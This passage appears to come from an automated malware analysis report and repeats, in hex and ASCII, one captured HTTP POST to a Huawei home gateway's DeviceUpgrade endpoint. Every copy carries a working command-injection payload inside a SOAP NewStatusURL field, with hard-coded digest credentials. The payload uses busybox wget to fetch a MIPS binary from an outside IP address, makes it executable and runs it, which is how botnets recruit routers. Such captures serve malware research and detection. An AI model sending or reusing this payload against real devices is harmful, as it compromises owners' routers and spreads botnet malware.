52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r 